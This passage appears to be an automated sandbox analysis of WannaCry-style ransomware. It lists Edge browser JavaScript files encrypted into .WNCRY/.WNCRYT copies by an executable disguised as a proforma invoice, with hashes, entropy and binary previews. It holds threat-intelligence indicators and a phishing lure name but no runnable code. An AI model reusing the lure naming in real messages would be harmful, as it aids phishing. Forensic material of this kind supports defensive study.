                                                          SHA-512:ACB00A07587D3C2CCB40EDC841C2870D445577713A95AD872B5B292A325A839663F143B292590F88848B49E53DB1B9F43F0C760C886B7C447AE5F0333B6821AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....[....|d.n.....6/..uJ.X..<mf.|...R.bj.....n*6J.....*nM........GZ\+ia.....zXT6.Qz....)..(..@...NA.}.7.BuV.m(t...1..44....E....=.(u..^.q2-/....}...AK...Hk\$d.~1.y..3.:.....D)...Z.......1.-...W.6_.=.s.......!(P.:c.Q.I.......H...x..M.)Z.&x`..Y&9f........7......l-V...X.....<.AV`..>.c....&......WVp{...}..*..lD....va./..p.M.S............<.......;..U........D@..p+...(..E.2....#x.<.....?....:8...DY2./Q..*...;o<....Rk9.F....R.....R...^..[eY.9.)c-.:.@ w....~.J..%..'......u....O......m....X.n.......OL._5,....#.K..p.....w.....5....60.............8.a.......D..MX......b.aZ...5b_@...S..-....7.j..aJ]w..O.,.....s.n.e.......lGzR....6..f........v...ax.a.S,.eQ.QE......_.0.>.,.Wv.q.4cMc..o.._gS..`.X,7&u....7....)Jp.w...r].m.j..=.,.x.!..'....i...h.kh......G..;c..&...h-...1..;e..........r.7..Y.2....dkE.+....=,V..>X{...k.k..{..v.kj.:i2.7Vq.Ki.Z.....|....Z...f12.T..l...dp$.....K.IS*{......gG.......iB.....J{...G.i.....Z.D.....).X..cI...,.L..V.^.N.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80072
                                                          Entropy (8bit):7.997578833851237
                                                          Encrypted:true
                                                          SSDEEP:1536:CoV74f8veOI/Go21dTzBXVrM11MI3edMAI70DTkJNfCWjXK3DdYh84LIrd:KGo+XVw11F3edMKgVu3DdYh8kKd
                                                          MD5:795F96BF5A069F3CD1A1CB7707F3678C
                                                          SHA1:9B150A586F2A6BFCA9F6765974753E2E5D5D6B47
                                                          SHA-256:AFBD1B176ECB8DE7C7E4A1863E644E32AC4410230E15A0AC4C61DE3924E82403
                                                          SHA-512:ACB00A07587D3C2CCB40EDC841C2870D445577713A95AD872B5B292A325A839663F143B292590F88848B49E53DB1B9F43F0C760C886B7C447AE5F0333B6821AD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....[....|d.n.....6/..uJ.X..<mf.|...R.bj.....n*6J.....*nM........GZ\+ia.....zXT6.Qz....)..(..@...NA.}.7.BuV.m(t...1..44....E....=.(u..^.q2-/....}...AK...Hk\$d.~1.y..3.:.....D)...Z.......1.-...W.6_.=.s.......!(P.:c.Q.I.......H...x..M.)Z.&x`..Y&9f........7......l-V...X.....<.AV`..>.c....&......WVp{...}..*..lD....va./..p.M.S............<.......;..U........D@..p+...(..E.2....#x.<.....?....:8...DY2./Q..*...;o<....Rk9.F....R.....R...^..[eY.9.)c-.:.@ w....~.J..%..'......u....O......m....X.n.......OL._5,....#.K..p.....w.....5....60.............8.a.......D..MX......b.aZ...5b_@...S..-....7.j..aJ]w..O.,.....s.n.e.......lGzR....6..f........v...ax.a.S,.eQ.QE......_.0.>.,.Wv.q.4cMc..o.._gS..`.X,7&u....7....)Jp.w...r].m.j..=.,.x.!..'....i...h.kh......G..;c..&...h-...1..;e..........r.7..Y.2....dkE.+....=,V..>X{...k.k..{..v.kj.:i2.7Vq.Ki.Z.....|....Z...f12.T..l...dp$.....K.IS*{......gG.......iB.....J{...G.i.....Z.D.....).X..cI...,.L..V.^.N.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):988600
                                                          Entropy (8bit):7.999804326805857
                                                          Encrypted:true
                                                          SSDEEP:24576:nDo3l7qnkR1JZLncRRHGEKXiIIEEzQ40UPisTQS3aGCBnBBWT98:nU3l7yacRRDKSIqTPi+QS3voSG
                                                          MD5:EE3E04B433CD1452443AEEC906AE1F95
                                                          SHA1:F027A686B03448081E2BF56929D108BE5590CD88
                                                          SHA-256:F1C2D4B15E3C30483EBED426EF30BC6E61FA31BBEB1C83A2CD926B9E7527632E
                                                          SHA-512:A0D57E33B52C4281FE048FA2537A8A7A6C2C1434B8FD9CB23A9689C3F5D95DA70A3808031B8F6B1558EA71B9475129D0BA5C0BF210E2EA95710893C5391AE275
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....THpI.f...^..........n....*%0..I5.D..5..........@..yfq...7.u.4..N....R.H.8..7.\.>...".JM.#a.[.....d.....'.'US...(.j..*.........A.4v...E..J..2.P....0...fbNi...k.......g..W`..xi........E..iU.v.].f......../..L..].,..:.uH.r#-=.;[...Jpj.m.E...................hM..q..........@.H...U^.....?.O%...Jy......H0........P..+.G.=.C...jo...Y#]..,I..6..c....p.F.J...R...L2Qo.....$F=^..O.o.. ..D..^(.'N...Pt....i.Fw............V(....V..^4..5.l....+.`.../2.2Az.. &...Y.K.C.{.E\*.:L...-y@A{-.tQ|..j........x.....P....._.\/.En.. k.0...+^.......0..w....+pW..E...)|...B.~...`..p"....[i..5....k..[.L...j...~.(V..1...)....6.P(E............f..1,#.REy..x^hC.(...qM@.O..........F..o.2...vu.M......rSn*.....$...u..........o1....<<.*z.....C.S.R!..'H...{.^......j.fj.2.s.....6..I...d.V..0.\.u.3Nr.J......h..D.K.1.g..F..0m.,t(.6$K.%...*..<..E......s+..;.T9r...t..|..x.]...6.Y..YP...V....B.P.l.&^....%%...Y1.5.\..0..(hw.......4.......e... r.>.Y..#j.R...T..g8.cUM.G...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):988600
                                                          Entropy (8bit):7.999804326805857
                                                          Encrypted:true
                                                          SSDEEP:24576:nDo3l7qnkR1JZLncRRHGEKXiIIEEzQ40UPisTQS3aGCBnBBWT98:nU3l7yacRRDKSIqTPi+QS3voSG
                                                          MD5:EE3E04B433CD1452443AEEC906AE1F95
                                                          SHA1:F027A686B03448081E2BF56929D108BE5590CD88
                                                          SHA-256:F1C2D4B15E3C30483EBED426EF30BC6E61FA31BBEB1C83A2CD926B9E7527632E
                                                          SHA-512:A0D57E33B52C4281FE048FA2537A8A7A6C2C1434B8FD9CB23A9689C3F5D95DA70A3808031B8F6B1558EA71B9475129D0BA5C0BF210E2EA95710893C5391AE275
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....THpI.f...^..........n....*%0..I5.D..5..........@..yfq...7.u.4..N....R.H.8..7.\.>...".JM.#a.[.....d.....'.'US...(.j..*.........A.4v...E..J..2.P....0...fbNi...k.......g..W`..xi........E..iU.v.].f......../..L..].,..:.uH.r#-=.;[...Jpj.m.E...................hM..q..........@.H...U^.....?.O%...Jy......H0........P..+.G.=.C...jo...Y#]..,I..6..c....p.F.J...R...L2Qo.....$F=^..O.o.. ..D..^(.'N...Pt....i.Fw............V(....V..^4..5.l....+.`.../2.2Az.. &...Y.K.C.{.E\*.:L...-y@A{-.tQ|..j........x.....P....._.\/.En.. k.0...+^.......0..w....+pW..E...)|...B.~...`..p"....[i..5....k..[.L...j...~.(V..1...)....6.P(E............f..1,#.REy..x^hC.(...qM@.O..........F..o.2...vu.M......rSn*.....$...u..........o1....<<.*z.....C.S.R!..'H...{.^......j.fj.2.s.....6..I...d.V..0.\.u.3Nr.J......h..D.K.1.g..F..0m.,t(.6$K.%...*..<..E......s+..;.T9r...t..|..x.]...6.Y..YP...V....B.P.l.&^....%%...Y1.5.\..0..(hw.......4.......e... r.>.Y..#j.R...T..g8.cUM.G...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5653560
                                                          Entropy (8bit):7.999961732636273
                                                          Encrypted:true
                                                          SSDEEP:98304:tYr91bw9M2F+nXB2uAuJajgkDz/BWW7g6Uq+EynRbLIOYAWvhqVl61OrmwzQxG:kk9/+nR2uAecDz/5Y3TRbEOlW8l0EDz1
                                                          MD5:F65033494A2F23CB39D358834396EF75
                                                          SHA1:F9B5ED080571B48D2E53679F58453372CE6134AA
                                                          SHA-256:05245F40F3262EE74FBE71293519D2ACFD3CD0F9EC3994B6B33441623ED1DE6A
                                                          SHA-512:61ED8DB415678CA992D600B03FFD5A1BCA8E473B21D9E36942AFF16867A7CA9CC53CA8E44881F59CD31B8AA0F3549677964D121441274D4FB2B267D2449F8DD6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........>G.4.R.U....,.R....x*.s|0..\h....S7....\\.e.bI...T.$...[.....K^.fuj....n.6.[.........\...c........XV.%.v.H..k.7.W.V`..kMrH5._...zS.G.+.Y..... .PE....`.i/....,.b........t..P...C+.5..P%..A8:~.'[..+.*.C).s..l;.3p.....Z...e...9.z......BY...bW`.x.....CV........vh......i..$uR...bg..+6h.....s..vi.t.....{B..*..v:..a.i..z D...w.9#.G..g.D.|0..c6.Y.+.=.'n....s.....C_...Z....i...#.....F.+.8..S/M.BZ.!.....p.8....L..j..hH....+.~..$?]C.&.n..u........k..?B}.0?(.{..%....kE6...f...?z...2.W<.$j" ....L...T.vY.0...ku......q....8.b.+......#.W.o'.G....U)./..;;H'..Qlu.t..~.e.Z'0q_"....%OX=k.G.~b.sy..4..>T...3+....!N....G..8....B.. ...`........{.2.}.n.Y..*2A....@.O....2..5...z.a..o.V.l.....c.K..!#...D[..Q..E8!....... .W..<.t.d....P_..p...'.b.Mi.2.R..|n.&.+..S.L1Vu...ZF.YTB..$<.....H.Z..Pc.-0....B[..].v..~Q..?..._.....n49..]..m........Q%..n0.....Qt-?..........D.........Cm.<.B.}..x.P,...C.....zF.hrm..}.r...0.;.6z.D%.ql5....B.\..$..... 7...|[s....X.P..!?I3..X.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5653560
                                                          Entropy (8bit):7.999961732636273
                                                          Encrypted:true
                                                          SSDEEP:98304:tYr91bw9M2F+nXB2uAuJajgkDz/BWW7g6Uq+EynRbLIOYAWvhqVl61OrmwzQxG:kk9/+nR2uAecDz/5Y3TRbEOlW8l0EDz1
                                                          MD5:F65033494A2F23CB39D358834396EF75
                                                          SHA1:F9B5ED080571B48D2E53679F58453372CE6134AA
                                                          SHA-256:05245F40F3262EE74FBE71293519D2ACFD3CD0F9EC3994B6B33441623ED1DE6A
                                                          SHA-512:61ED8DB415678CA992D600B03FFD5A1BCA8E473B21D9E36942AFF16867A7CA9CC53CA8E44881F59CD31B8AA0F3549677964D121441274D4FB2B267D2449F8DD6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........>G.4.R.U....,.R....x*.s|0..\h....S7....\\.e.bI...T.$...[.....K^.fuj....n.6.[.........\...c........XV.%.v.H..k.7.W.V`..kMrH5._...zS.G.+.Y..... .PE....`.i/....,.b........t..P...C+.5..P%..A8:~.'[..+.*.C).s..l;.3p.....Z...e...9.z......BY...bW`.x.....CV........vh......i..$uR...bg..+6h.....s..vi.t.....{B..*..v:..a.i..z D...w.9#.G..g.D.|0..c6.Y.+.=.'n....s.....C_...Z....i...#.....F.+.8..S/M.BZ.!.....p.8....L..j..hH....+.~..$?]C.&.n..u........k..?B}.0?(.{..%....kE6...f...?z...2.W<.$j" ....L...T.vY.0...ku......q....8.b.+......#.W.o'.G....U)./..;;H'..Qlu.t..~.e.Z'0q_"....%OX=k.G.~b.sy..4..>T...3+....!N....G..8....B.. ...`........{.2.}.n.Y..*2A....@.O....2..5...z.a..o.V.l.....c.K..!#...D[..Q..E8!....... .W..<.t.d....P_..p...'.b.Mi.2.R..|n.&.+..S.L1Vu...ZF.YTB..$<.....H.Z..Pc.-0....B[..].v..~Q..?..._.....n49..]..m........Q%..n0.....Qt-?..........D.........Cm.<.B.}..x.P,...C.....zF.hrm..}.r...0.;.6z.D%.ql5....B.\..$..... 7...|[s....X.P..!?I3..X.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping_iframe_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12216
                                                          Entropy (8bit):7.983884513815287
                                                          Encrypted:false
                                                          SSDEEP:192:N5zOMNZsPhbNP2/omwIVAen2vZBYTrejNYgTzNmrP1qAkD73Wj8OrixipmrYt4K8:nHNZsPhVeozaqB7ZYgTzNW2HbQt42kMg
                                                          MD5:43369E678CD6E6B121A10EEDA36539A8
                                                          SHA1:B166766F8DFFBC1BDF28330D2FD5CD582CFF2075
                                                          SHA-256:8458857A7B2ED521CF17F572AE4912040C9AD579C66405549BD01A855F361F6A
                                                          SHA-512:440412408332D2AD27E2AD9BDA2CD0AA121BE2EFCA6ED5D2CB61845570A8A4395371E5E109E2F0D51C288AE20947F8917A334D43A79F9FA419350319C903B892
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........u....y.h......F...3..AA.._h.8/_.f..;7.].E./...;...e.....L +!....e...Q.P.....#."D........* ......L$.....?...A`X....~[G.6.K.%..=..L...=%*0.."..8T..M.v....o.`.`UH,....51.../jO....P...C..Z.1...6;...=...A....k......Yo.....!.4q.&..n..Wz=.......vq?..............B\.....Ak.{.x&.VE0.F....d..H}1...5.S..H.>.a..,Y..Z.....C.~@Z..(7..:....N.o'.T55....j[.J....].f..k9.JG.P...s..Z.....K...O.w..1..4.9.?.KJ..m.....~...S.......^..5.ZE..y.>y...[..S........_7.M..G.8.A.I.mM......M.$...9.=...9..l^...b..$..x......L....V0..|...j......l...PH...L...2............q..4y.L5"r=.]t.....h....d.u......K.bT&..2|..|.(......(..8.)...#....*..)..#.. ....?........\...}..7..\`.T#.=....Z.....=.C#.K...'....A...\.g/..J...R.\.D..{W..z.?.9...D X........Mx_(.....=..p..}:K;....W....4...e....S...p[.O.SP..>....a...'a......\.....J.6.U#...t...[J..wu2.tO...`E...T..Md.....M.R..[.)bu'....4..M.2../.0.. ....... ...<r..|.|Y'].d...8.a.........cM.~.(.i....f.9..I.....0..Z.....O,;......S..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping_iframe_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12216
                                                          Entropy (8bit):7.983884513815287
                                                          Encrypted:false
                                                          SSDEEP:192:N5zOMNZsPhbNP2/omwIVAen2vZBYTrejNYgTzNmrP1qAkD73Wj8OrixipmrYt4K8:nHNZsPhVeozaqB7ZYgTzNW2HbQt42kMg
                                                          MD5:43369E678CD6E6B121A10EEDA36539A8
                                                          SHA1:B166766F8DFFBC1BDF28330D2FD5CD582CFF2075
                                                          SHA-256:8458857A7B2ED521CF17F572AE4912040C9AD579C66405549BD01A855F361F6A
                                                          SHA-512:440412408332D2AD27E2AD9BDA2CD0AA121BE2EFCA6ED5D2CB61845570A8A4395371E5E109E2F0D51C288AE20947F8917A334D43A79F9FA419350319C903B892
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........u....y.h......F...3..AA.._h.8/_.f..;7.].E./...;...e.....L +!....e...Q.P.....#."D........* ......L$.....?...A`X....~[G.6.K.%..=..L...=%*0.."..8T..M.v....o.`.`UH,....51.../jO....P...C..Z.1...6;...=...A....k......Yo.....!.4q.&..n..Wz=.......vq?..............B\.....Ak.{.x&.VE0.F....d..H}1...5.S..H.>.a..,Y..Z.....C.~@Z..(7..:....N.o'.T55....j[.J....].f..k9.JG.P...s..Z.....K...O.w..1..4.9.?.KJ..m.....~...S.......^..5.ZE..y.>y...[..S........_7.M..G.8.A.I.mM......M.$...9.=...9..l^...b..$..x......L....V0..|...j......l...PH...L...2............q..4y.L5"r=.]t.....h....d.u......K.bT&..2|..|.(......(..8.)...#....*..)..#.. ....?........\...}..7..\`.T#.=....Z.....=.C#.K...'....A...\.g/..J...R.\.D..{W..z.?.9...D X........Mx_(.....=..p..}:K;....W....4...e....S...p[.O.SP..>....a...'a......\.....J.6.U#...t...[J..wu2.tO...`E...T..Md.....M.R..[.)bu'....4..M.2../.0.. ....... ...<r..|.|Y'].d...8.a.........cM.~.(.i....f.9..I.....0..Z.....O,;......S..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):358056
                                                          Entropy (8bit):7.999498092945844
                                                          Encrypted:true
                                                          SSDEEP:6144:vNMxNf2ideX0PDitXi4AB9P3kH+KdfbZrAxWQgqI3EFmtAu4N9qc5f/k0:lwf2mkiG9Ic+O3QFgEFmt2IC3k0
                                                          MD5:1F323DA03506042880E1F4F647CC8873
                                                          SHA1:66451231E9C2E813A2EAD8BDAE89DB5D1BB79FA2
                                                          SHA-256:1D1E4D8D06487A8561620EB8E2715CBBC3D043D493187A0C86FA3E38DC043AF5
                                                          SHA-512:0AAA5D0EEF4130201878E64302AD680F40D338ECD5DC5BFD1A5D9266D57C341EDC52ACAF3302E677B8F5C83030DEC4193A8F5920825BB35457A5877619259E00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......p..P.D......0..._...a...R..?.'o].8..".-P....w..x<....dYR(..gk./. .i.......Q....AI..F...f.E..Z.<.....F.rF.Gt~X....,..MH..Q..ai..f.n0.......Ah..x.p"..7.*...~......_..|...qqr9....q..W..x--....Y8m,<n7/..q..7 h@.6.o..i.:.K..:...1ZO....2...D.........u......>.:..FB..A.1.....C..IF..TV.lXM78....._3?.....t"... .f..WE...F.q.DC.N..9..h...... ....)..AJ~1..l.......l........;......8..L.;-.....).x.......\$..A@..2.....-tYN..q..y..(.Q@F......-.T\./..w]j.e.T....[....W.B...16$.>..y.`h..v.^`.e5Ro.....]......_..3..nyS..{.FF.8.Y............3.s.....,=L../..*z.DA..y3f._...%[.t..hO?.Tn....'...#(.&!u.{..V........c..3.....C..&dL0.t.W..g....E...E.#..gE?.Ttf..X..cI.._..<....!".Y!...e.......cl...2M^T._.E.K. .....!X.o.m*......5...M6..[].......T..D@..[v..~.5T^a.P..../....e.tn.J..N.(.rb.,......b...L..f...%po..N.....\JP{+.k..4S.L:......q......5d...1i..bZ....L.6BOt%..;..J...,=.j.1..'...b%ow..... ...`..G.%....*d.....$...p..;.i.";...V.....N..pYZ....v.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):358056
                                                          Entropy (8bit):7.999498092945844
                                                          Encrypted:true
                                                          SSDEEP:6144:vNMxNf2ideX0PDitXi4AB9P3kH+KdfbZrAxWQgqI3EFmtAu4N9qc5f/k0:lwf2mkiG9Ic+O3QFgEFmt2IC3k0
                                                          MD5:1F323DA03506042880E1F4F647CC8873
                                                          SHA1:66451231E9C2E813A2EAD8BDAE89DB5D1BB79FA2
                                                          SHA-256:1D1E4D8D06487A8561620EB8E2715CBBC3D043D493187A0C86FA3E38DC043AF5
                                                          SHA-512:0AAA5D0EEF4130201878E64302AD680F40D338ECD5DC5BFD1A5D9266D57C341EDC52ACAF3302E677B8F5C83030DEC4193A8F5920825BB35457A5877619259E00
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......p..P.D......0..._...a...R..?.'o].8..".-P....w..x<....dYR(..gk./. .i.......Q....AI..F...f.E..Z.<.....F.rF.Gt~X....,..MH..Q..ai..f.n0.......Ah..x.p"..7.*...~......_..|...qqr9....q..W..x--....Y8m,<n7/..q..7 h@.6.o..i.:.K..:...1ZO....2...D.........u......>.:..FB..A.1.....C..IF..TV.lXM78....._3?.....t"... .f..WE...F.q.DC.N..9..h...... ....)..AJ~1..l.......l........;......8..L.;-.....).x.......\$..A@..2.....-tYN..q..y..(.Q@F......-.T\./..w]j.e.T....[....W.B...16$.>..y.`h..v.^`.e5Ro.....]......_..3..nyS..{.FF.8.Y............3.s.....,=L../..*z.DA..y3f._...%[.t..hO?.Tn....'...#(.&!u.{..V........c..3.....C..&dL0.t.W..g....E...E.#..gE?.Ttf..X..cI.._..<....!".Y!...e.......cl...2M^T._.E.K. .....!X.o.m*......5...M6..[].......T..D@..[v..~.5T^a.P..../....e.tn.J..N.(.rb.,......b...L..f...%po..N.....\JP{+.k..4S.L:......q......5d...1i..bZ....L.6BOt%..;..J...,=.j.1..'...b%ow..... ...`..G.%....*d.....$...p..;.i.";...V.....N..pYZ....v.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\automation.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4552
                                                          Entropy (8bit):7.960881940796458
                                                          Encrypted:false
                                                          SSDEEP:96:oeZbYWmVeWV5Si9wUxXSDKpRbSR8fY0tV2ij/PnXSinl/kaax:tZvWLHxXpjS2j+ijnCIXY
                                                          MD5:46390D6749D2C64A03C0957D713FDC57
                                                          SHA1:393AC83A6122649FA2ECB50BD76B37E4332ABA10
                                                          SHA-256:386CD1EF82C59DEBF3113B93D57E0E1C59397B49C5419A34B0AA7C02CCC0D79A
                                                          SHA-512:70373428DD58F3FF723EF1355849FE20DC040E26FF9E7F6BDA4F3EFB76E4B402FC2B7400DFDA3799EEA11CAFBB501C8A0736C4D95E7C81C82C6DCB45F4BD4445
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S.x......UI......#.`....{... ".c.......{J...G......._.'....Jv)+../..g...A..C!...l...8)..R..;...8.E..].b..........^y.up&..AX.rz..q......)...|UG9.........3.............H.B.#....{.X48J.7.v.2\.....h*..y....B.k.m...F......&.. %..g..#>...Q...0.w.A............+.N.b..#.....n@M...].bF....e..;m...h.Y...9N.@g7..,..@.GP..D..r..6#.`^.8.".....6.....2=..d..'M...F..Iw..`..l.@..T.$G..:+..W...#......*..2...E2+.9..,.j..,....G.U'..up.%.N.p4>.C.D|x.". ..[.Y9w.....C..h.$..<...2?"...1...8.......P..."i+.0.r...23lb.?........a..F..S4.DBS..XbM...A. ,....gy..z.b....S>yTkN........%h.S..$c.{.W.AjV...\..t..........-.To.jFl.....W..../.M..ro9b....,...:k...w..hM...l.../..Q&.T.8K..WlOC...../...Y~.j.I..{T_.#..A...N[QM<...!,UU.....oY.p@.7.a.m....y.)........\.mUn.....qu.;g~..r*(...%...+.XjL":.I3....6-?-..V=.s..E.&6.{{.B_....B.b....|S....R.....>..A.=F...M*....NP'.|J.U...fvb.].N. .....#.....b.[..l...*...a..'Z.=.=.er.x..j.]..v.oy.J....s(.~......C..E.'..t....`...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\automation.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4552
                                                          Entropy (8bit):7.960881940796458
                                                          Encrypted:false
                                                          SSDEEP:96:oeZbYWmVeWV5Si9wUxXSDKpRbSR8fY0tV2ij/PnXSinl/kaax:tZvWLHxXpjS2j+ijnCIXY
                                                          MD5:46390D6749D2C64A03C0957D713FDC57
                                                          SHA1:393AC83A6122649FA2ECB50BD76B37E4332ABA10
                                                          SHA-256:386CD1EF82C59DEBF3113B93D57E0E1C59397B49C5419A34B0AA7C02CCC0D79A
                                                          SHA-512:70373428DD58F3FF723EF1355849FE20DC040E26FF9E7F6BDA4F3EFB76E4B402FC2B7400DFDA3799EEA11CAFBB501C8A0736C4D95E7C81C82C6DCB45F4BD4445
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S.x......UI......#.`....{... ".c.......{J...G......._.'....Jv)+../..g...A..C!...l...8)..R..;...8.E..].b..........^y.up&..AX.rz..q......)...|UG9.........3.............H.B.#....{.X48J.7.v.2\.....h*..y....B.k.m...F......&.. %..g..#>...Q...0.w.A............+.N.b..#.....n@M...].bF....e..;m...h.Y...9N.@g7..,..@.GP..D..r..6#.`^.8.".....6.....2=..d..'M...F..Iw..`..l.@..T.$G..:+..W...#......*..2...E2+.9..,.j..,....G.U'..up.%.N.p4>.C.D|x.". ..[.Y9w.....C..h.$..<...2?"...1...8.......P..."i+.0.r...23lb.?........a..F..S4.DBS..XbM...A. ,....gy..z.b....S>yTkN........%h.S..$c.{.W.AjV...\..t..........-.To.jFl.....W..../.M..ro9b....,...:k...w..hM...l.../..Q&.T.8K..WlOC...../...Y~.j.I..{T_.#..A...N[QM<...!,UU.....oY.p@.7.a.m....y.)........\.mUn.....qu.;g~..r*(...%...+.XjL":.I3....6-?-..V=.s..E.&6.{{.B_....B.b....|S....R.....>..A.=F...M*....NP'.|J.U...fvb.].N. .....#.....b.[..l...*...a..'Z.=.=.er.x..j.]..v.oy.J....s(.~......C..E.'..t....`...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\classification.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.834418573675154
                                                          Encrypted:false
                                                          SSDEEP:24:bkxVhyBrozsRK2Bim7OEKyyCct7TMwPvoXgaYEomInql94nq:bkkRrK2Bim74yOPMgwXga3fInqEq
                                                          MD5:EB16A3C4405C9941F347619F458810DD
                                                          SHA1:B96E0BE27EEFE6951BA8E53841EAA20259C9DB97
                                                          SHA-256:2A62122B1505A4C82623496A573CDEA80C4ED985A2D919527AF42A29CEDB9A0F
                                                          SHA-512:5C3588D60E040A90CFD3B9B0E9689EB6416F53162901A4F5E33F0D8FB3418BAAF839BB36E7DB4CB0881EBBA6AA6CA5632C28D273EED25B4C2F5F48E822A43458
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......r!.zN.]..'1K..Y..=.D.w..#...^..l*..?.6%.x.x..\E-5._.`n..Q......f...@i.X...(&.{.\....e.=i..$^.i%..8....M.:..x..D[X..+0....m..+?.).JhC......{0t.d%l|):H..O......v...Z ........x...I.G.z.&....L.=.B...Q.%.ZM}*.._.y......Z+M.3.d.4.../@.7.......k..y...._........d.........rV.?.P......:.......}...[.'.^..^...Yg...G..Pj.....h.9../.D.n>pFT.o...bJ..j.r^.P..*L2.K..Duzi..5..}l..C*E=}..(...&!..H.7.!0.y.HF.s.m.~w;....\.J.!...DH....!9.....J..).k....d.....d..."x.*..1..*..b..A.....m3........wJ.....)..mv...l.w.\..d.......~2.a...,..CAPd.....1)HY...Y../.....y..ca...(.Sy.s..*......K.f{...E.<.........9.'......l3Tyz.(|.Sjd.C)..N.v.1mu..e2.S..K..........V.qn.....d...x...s......t...y.0.n....G.$i..../V5..9.T..:...c.b..?...O.....:/..Z.f......}K.jX.....D..v3..C...3.I7...F%.e.....~.9c..3....,.X..BH...<Z...(...b..0K....q:.2..v+d.\.^.O...mcG..}.9[.g.....d.^..k...ft.....A..2..H..$..._.l.2..S.....h#3.......X...oV.5Rh*..q.n.W.r.e!f..|.....ar.<..."..m.9.?qj..x..../7...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\classification.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.834418573675154
                                                          Encrypted:false
                                                          SSDEEP:24:bkxVhyBrozsRK2Bim7OEKyyCct7TMwPvoXgaYEomInql94nq:bkkRrK2Bim74yOPMgwXga3fInqEq
                                                          MD5:EB16A3C4405C9941F347619F458810DD
                                                          SHA1:B96E0BE27EEFE6951BA8E53841EAA20259C9DB97
                                                          SHA-256:2A62122B1505A4C82623496A573CDEA80C4ED985A2D919527AF42A29CEDB9A0F
                                                          SHA-512:5C3588D60E040A90CFD3B9B0E9689EB6416F53162901A4F5E33F0D8FB3418BAAF839BB36E7DB4CB0881EBBA6AA6CA5632C28D273EED25B4C2F5F48E822A43458
                                                          Malicious:false
